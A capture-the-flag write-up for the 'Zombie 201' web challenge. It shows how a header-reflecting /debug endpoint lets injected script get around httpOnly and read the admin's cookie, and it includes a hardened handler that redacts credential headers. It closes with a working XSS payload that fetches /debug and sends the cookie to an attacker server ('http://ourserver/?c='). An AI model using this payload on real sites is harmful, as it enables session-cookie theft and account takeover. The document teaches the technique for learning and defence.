Zombie 201 - Web
Description
Congratulations, you got the admin’s cookie! Can you do it again? It might be a little harder this time. You are well on your way through the gauntlet. You can’t stop now.
The task is the same as in the previous part, the “Zombie 101” challenge: all the files are the same, only the configuration differs.
Line 9 of the docker-compose.yml file shows the configuration that changed:
configFile: '{"flag": "wctf{redacted}", "httpOnly": true, "allowDebug": true}'
In the previous part httpOnly was set to false, which let us read the admin cookie from JavaScript through document.cookie. This time it is true, so document.cookie no longer exposes it.
We can also see that the allowDebug option is still set to true.
Here is the /debug endpoint code:
    app.get('/debug', function(req, res) {
        if (config.allowDebug) {
            // Reflects the client IP and every request header back to the caller,
            // the Cookie header included
            res.send({"remote-ip": req.socket.remoteAddress, ...req.headers})
        }
        else {
            res.send('sorry, debug endpoint is not enabled')
        }
    })
Since allowDebug is set to true, we can use that endpoint to leak the admin cookie. The handler spreads req.headers straight into the response, so every request header is reflected back to the caller, including the Cookie header (Node lowercases header names, so it comes back under the key cookie). httpOnly only blocks access through document.cookie; it does not stop the browser from attaching the cookie to a same-origin fetch() issued by injected script, and the reflected response is readable by that same script.
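To make the leak concrete, here is an added example (not the challenge's own code) that models the /debug handler as a plain function beside a hardened variant that redacts credential-bearing headers, plus the attacker-side parsing of the reflected Cookie header. The function names, the sensitive-header list and the sample admin request are assumptions for this example; it needs no Express and runs offline.

```javascript
// Added example (not the challenge's own code): the /debug handler modelled as a
// plain function beside a hardened variant, and the attacker-side parsing of the
// reflected Cookie header. Names are hypothetical; no Express needed.

// Headers an internal debug view should never echo back. The list is an
// assumption for this example; extend it for whatever your app treats as a credential.
const SENSITIVE_HEADERS = new Set([
  'cookie',
  'authorization',
  'proxy-authorization',
  'x-api-key',
]);

const DEBUG_DISABLED = 'sorry, debug endpoint is not enabled';

// Same behaviour as the challenge handler: spread every request header into the body.
function debugVulnerable(config, req) {
  if (!config.allowDebug) return DEBUG_DISABLED;
  return { 'remote-ip': req.socket.remoteAddress, ...req.headers };
}

// Hardened variant: same shape, but credential-bearing headers are redacted.
// A real app should also gate a debug view behind authentication, not a config flag.
function debugHardened(config, req) {
  if (!config.allowDebug) return DEBUG_DISABLED;
  const body = { 'remote-ip': req.socket.remoteAddress };
  for (const [name, value] of Object.entries(req.headers)) {
    body[name] = SENSITIVE_HEADERS.has(name.toLowerCase()) ? '[redacted]' : value;
  }
  return body;
}

// Attacker side: the exfiltrated value is the whole Cookie header, so split it
// into name/value pairs to pick out the cookie we care about. Only the first '='
// separates name from value, so values containing '=' survive intact.
function parseCookieHeader(header) {
  const cookies = {};
  for (const part of header.split(';')) {
    const idx = part.indexOf('=');
    if (idx === -1) continue; // skip malformed fragments
    const name = part.slice(0, idx).trim();
    const value = part.slice(idx + 1).trim();
    if (name) cookies[name] = value;
  }
  return cookies;
}

// Constructed sample request: what the admin bot's browser sends when the injected
// fetch() hits /debug. Node lowercases header names, hence the key `cookie`.
const adminRequest = {
  socket: { remoteAddress: '127.0.0.1' },
  headers: {
    host: 'zombie-201.example',
    cookie: 'flag=wctf{example}; session=abc123',
    'user-agent': 'HeadlessChrome',
  },
};

// Walk through the leak and the fix with the same request.
function demo() {
  const config = { allowDebug: true, httpOnly: true };
  const leaked = debugVulnerable(config, adminRequest);
  const safe = debugHardened(config, adminRequest);
  return {
    leakedFlag: parseCookieHeader(leaked.cookie).flag, // 'wctf{example}'
    hardenedCookie: safe.cookie,                       // '[redacted]'
  };
}

console.log(demo());
```

The point the comparison makes: with httpOnly set, document.cookie is empty for the injected script, yet debugVulnerable still hands the full Cookie header back because the browser attached it to the same-origin request. Redacting the header server-side (debugHardened) closes that path; disabling allowDebug outside development closes it entirely.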
Let's craft our payload. We want the admin's browser to:
- fetch the /debug endpoint
- parse the result as JSON
- retrieve the cookie entry
- exfiltrate the cookie to a server we control
Here is the final payload:
    //Fetch debug page
    fetch("https://zombie-201-tlejfksioa-ul.a.run.app/debug").then(
        function(response) {
            //get result as json
            return response.json();
        }
    ).then(
        function(data) {
            //get cookie entry and exfiltrate
            window.location.href = "http://ourserver/?c=".concat(data['cookie']);
        }
    );
Send it to the admin via the /visit endpoint and get the flag :+1:
Here is the flag: wctf{h1dd3n-c00k135-d1d-n07-h31p-373964}